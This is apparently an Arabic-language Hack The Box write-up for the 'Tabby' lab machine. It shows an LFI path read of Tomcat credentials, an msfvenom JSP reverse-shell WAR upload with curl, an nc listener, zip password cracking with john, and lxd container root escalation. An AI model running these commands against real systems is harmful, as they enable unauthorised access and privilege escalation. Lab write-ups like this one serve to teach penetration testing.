Posts Hackthebox tabby
Post
Cancel

Hackthebox tabby

Created by fasto

My profile : https://www.hackthebox.eu/home/users/profile/

Sammmry :

Desktop View

1
2
3
4
linux شغالة على easy machine عبارة عن Tabby
وبعد ذلك نرفع شال tomcatتمكننا من سحب كلمة سر lfi بالفحص المبدئي نجد
الذي user نقوم بكسره ثم نستخدم كلمة السر للحصول على zip fileونبحث لنجد
ootللحصول على alpine-builderنستخدم admو lxd بدوره ينتمي الى
  • Sammmry :
  • 1 enumeration
    • 1.1 Nmap
    • 1.2 Port
  • 2 lfi
    • 2.1 shell
    • 2.2 Backup.zip
    • 2.3 zip crack
    • 2.4 User.txt
  • 3 privilege escalation

1 enumeration

1.1 Nmap

1
nmap نبدا بفحص البورتات باستخدام

Desktop View

نجد بورت 8080 و 80 مفتوحين

80 : httpd

8080 :tomcat

1.2 Port

1
codee source اثناء تصفح بورت 80 نجد دومين في 

Desktop View

1
2
عند فتح /etc/hostsفي domain نقوم باضافة
LFIوفحصه نجد انه مصاب بثغرة url

Desktop View

1
2
http://10.10.10.194:8080 بعد فتح
/usr/shareتحت tomcat نكتشف ان

http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html

1
2
3
: ب password نسحب
http://10.10.10.194/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-
users.xml

2 lfi

Desktop View

2.1 shell

: حصلنا على كلمة المرور نقوم ب الدخول الى السيرفر

1
2
3
shellنتبع الشرح التالي لرفع
https://gist.github.com/pete911/
.warبصيغة msfvenom ب shell نقوم بانشاء

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14. LPORT=5555 -f war > shell.war

Desktop View

1
الخاص بنا shell نرفع
1
2
3
4
curl --user 'tomcat':'$3cureP4s5w0rd123!' --upload-file shell.war
'http://10.10.10.194:8080/manager/text/deploy?path=/ts'
https://phantominfosec.wordpress.com/2020/07/08/htb-tabby-
walkthrough/
1
2
nc –lnvp 5555 نشغل
shell ثم نتصفح

http://10.10.10.194:8080/ts

Desktop View

الان نحصل على اتصال

Desktop View

2.2 Backup.zip

/var/www/html/files بعد البحث داخل السيرفر نجد في مسار

ملف

16162020_backup.zip

1
2
نقوم بنقله الى جهازنا
ثم فك التشفير base64 قمت بتشفيره ب

Base 64 –w0 16162020_backup.zip

Desktop View

base64 –d encoded >1.zip

2.3 zip crack

1
نجد انه محمي بكلمة سر unzipعند محاولة فك

Desktop View

1
johnنقوم بكسرها باستخدام

zip2john 1.zip > out.txt john out.txt -wordlist=rockyou.txt

1
user ashنقوم بتجريبها على admin@itنجد كلمة السر

Desktop View

Desktop View

2.4 User.txt

1
ash تمكنا بالدخول ب

Desktop View

3 privilege escalation

1
2
3
4
عند البحث في lxdو adm ينتمي الى ash نجد ان id عند كتابة
privilege escalationجوجل نجد مقال يتحدث عن
https://www.hackingarticles.in/lxd-privilege-
escalation
1
alpine-builderنحمل
1
2
https://github.com/saghul/lxd-
alpine-builder.git

Desktop View

1
2
lxc image import ./alpine-v3.12-x86_64-20201030_1631.tar.gz --alias fasto
lxc image list

Desktop View

lxd init

Desktop View

1
2
3
ash@tabby:~$ lxc init fasto groot -c security.privileged=true
ash@tabby:~$ lxc config device add groot mydevice disk
source=/ path=/mnt/root recursive=true
1
2
ash@tabby:~$ lxc start groot
ash@tabby:~$ lxc exec groot /bin/sh

Desktop View

1
2
/mnt/root/root نذهب الى root حصلنا على
flagنجد

Desktop View

This post is licensed under CC BY 4.0 by the author.

Trending Tags

Contents

Trending Tags